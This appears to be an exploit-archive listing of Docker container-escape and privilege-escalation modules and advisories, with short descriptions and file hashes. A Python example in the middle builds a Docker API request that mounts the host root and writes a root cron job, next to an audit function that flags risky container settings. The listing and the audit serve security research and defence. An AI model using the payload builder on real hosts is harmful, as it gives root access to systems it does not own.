Docker versions prior to 1.6.1 suffer from privilege escalation and information disclosure vulnerabilities.
95ee351837d4eafc2ac444cb87bd4b716e7c5f58566ada9fb56a9b758dee33cc
This Metasploit module leverages a flaw in runc to escape a Docker container and get command execution on the host as root. This vulnerability is identified as CVE-2019-5736. It overwrites the runc binary with the payload and waits for someone to use docker exec to get into the container. This will trigger the payload execution. Note that executing this exploit carries important risks regarding the Docker installation integrity on the target and inside the container.
cccb41227aca832e89e9a6f586e66617bdec002e1dded9d5addd44548302edb1
This Metasploit module leverages an insecure setting to get remote code execution on the target OS in the context of the user running Gitea. This is possible when the current user is allowed to create git hooks, which is the default for administrative users. For non-administrative users, the permission needs to be specifically granted by an administrator. To achieve code execution, the module authenticates to the Gitea web interface, creates a temporary repository, sets a post-receive git hook with the payload and creates a dummy file in the repository. This last action triggers the git hook and executes the payload. Everything is done through the web interface. It has been mitigated in version 1.13.0 by setting the Gitea DISABLE_GIT_HOOKS configuration setting to true by default. This disables the feature and prevents all users (including admin) from creating custom git hooks. This module has been tested successfully against Gitea versions 1.12.5, 1.12.6 and 1.13.6 with DISABLE_GIT_HOOKS set to false, and on version 1.12.6 on Windows.
777838a8c7aba78aa158817a5091acfd7337de3556b2fc8c26c13ab9c90a1621
This Metasploit module escapes from a privileged Docker container and obtains root on the host machine by abusing the Linux cgroup notification on release feature. This exploit should work against any container started with the following flags: --cap-add=SYS_ADMIN, --privileged.
96e3dd9d2191efa268a444e84e7547c50e9a4480e50aec7c0ffb4d80ebaaaf32
This Metasploit module leverages a vulnerability in Docker Desktop Community Edition versions prior to 2.1.0.1 where an attacker can write a payload to a lower-privileged area that is then executed automatically by the docker user at login.
eaa66458a1be58495d72ac8518ba2b5c7ce4adda66caa2a735da2834489bbc19
Proof of concept instructions to exploit a Docker container escape vulnerability.
59a356c08ff9521c88b5300d8e1a4bce79db65704f01e01b54cbd581fecab881
Utilizing Docker via an unprotected TCP socket (2375/tcp, or 2376/tcp with TLS but without TLS client authentication), an attacker can create a Docker container with the host's '/' path bind-mounted read/write into the container. Because commands inside the container run as uid 0 and the host kernel honours that uid on the mounted filesystem, the attacker can edit or create files owned by root on the host. This exploit abuses this to create a cron job in the '/etc/cron.d/' path of the host server. The Docker image should exist on the target system or be a valid image from hub.docker.com.
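Added example (not code from any of the listed modules): the request body that the unprotected-socket technique above sends to the Docker Engine API, and an audit function that flags the HostConfig settings the privileged-container and host-mount escapes in this listing depend on (Privileged, CAP_SYS_ADMIN, a bind mount of the host root or the Docker socket). The JSON shape follows the Docker Engine API for POST /containers/create and the output of docker inspect; no daemon is contacted, and the image name, mount point and cron file name are assumptions chosen for illustration.

```python
import shlex

# Assumed defaults for the illustration; the real module lets the user pick these.
DEFAULT_IMAGE = "alpine:latest"
DEFAULT_HOST_MOUNT = "/host"
DEFAULT_CRON_FILE = "/etc/cron.d/escape"


def build_cron_escape_request(image=DEFAULT_IMAGE, host_mount=DEFAULT_HOST_MOUNT,
                              cron_file=DEFAULT_CRON_FILE,
                              command="/bin/sh -c 'id > /tmp/pwned'"):
    """Return the JSON body for POST /containers/create that bind-mounts the
    host's '/' read/write at host_mount and writes a root cron job through it.
    cron.d lines use the format: minute hour day month weekday user command."""
    cron_line = "* * * * * root %s\n" % command
    # One shell command is enough: write the cron file through the host mount.
    cmd = ["/bin/sh", "-c",
           "printf '%%s' %s > %s%s" % (shlex.quote(cron_line), host_mount, cron_file)]
    return {
        "Image": image,
        "Cmd": cmd,
        # Binds entries are "host_path:container_path[:options]".
        "HostConfig": {"Binds": ["/:%s:rw" % host_mount]},
    }


# Host paths whose exposure gives a container root-equivalent access to the host.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/proc", "/sys",
                        "/var/run/docker.sock", "/run/docker.sock")


def _is_sensitive(host_path):
    """True if host_path is, or lies under, one of SENSITIVE_HOST_PATHS."""
    path = host_path.rstrip("/") or "/"
    for sensitive in SENSITIVE_HOST_PATHS:
        if path == sensitive or sensitive != "/" and path.startswith(sensitive + "/"):
            return True
    return False


def audit_host_config(container):
    """Return a list of findings for one docker inspect-style object.
    Checks Privileged, CapAdd and both the Binds and Mounts representations
    of host bind mounts."""
    host_config = container.get("HostConfig") or {}
    findings = []
    if host_config.get("Privileged"):
        findings.append("Privileged=true: all capabilities, host devices, no seccomp/AppArmor")
    caps = set()
    for cap in host_config.get("CapAdd") or []:
        caps.add(cap[4:] if cap.startswith("CAP_") else cap)
    if caps & {"SYS_ADMIN", "ALL"}:
        findings.append("CAP_SYS_ADMIN: can mount cgroupfs and abuse release_agent")
    for bind in host_config.get("Binds") or []:
        source = bind.split(":", 1)[0]
        if _is_sensitive(source):
            findings.append("bind mount of host path %s" % source)
    for mount in container.get("Mounts") or []:
        if mount.get("Type") == "bind" and _is_sensitive(mount.get("Source", "")):
            findings.append("bind mount of host path %s" % mount["Source"])
    return findings


if __name__ == "__main__":
    # Constructed sample: the container the socket exploit would create.
    request = build_cron_escape_request()
    print(request)
    print(audit_host_config(request))
```

The audit runs over the same JSON that docker inspect returns, so it can be pointed at a dump of every container on a host to find the ones that an attacker with a shell inside could turn into root on the host.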
5eef6332da7f2e3eafd6c25adcb58e15c04382cde4fdec2987c6b2d85ab64dfe
Docker Engine versions prior to 1.12.6 suffer from an insecure open of a file descriptor.
c6dd4934c055006df86b6145b7e548b07287014ac26ce1af46e0b6fa783d1157
Docker versions 1.11.2 and below suffer from an issue where a forged VXLAN packet can be leveraged to scan services that are not exposed.
a4e4a57ace4ef27819179237d6afd95b851a2dcb97baf0583bc8133f4f80246a
This Metasploit module obtains root privileges from any host account with access to the Docker daemon. Usually this includes accounts in the docker group.
21635da937bd87b43dde24314b9ad467daff6d045814c41f0388dc2c1020eeb3
Docker version 1.3.3 has been released to address privilege escalation, path traversal, and spoofing vulnerabilities.
8500831f87dd1053a5b03c9bb78a961217c43693b105c24e9149353125d6553a
Docker versions prior to 1.3.2 suffer from privilege and container escalation vulnerabilities.
f3ea689d0955e5745699f82d7c1d878c1c96110a77a052bec055fa5cc225fbc5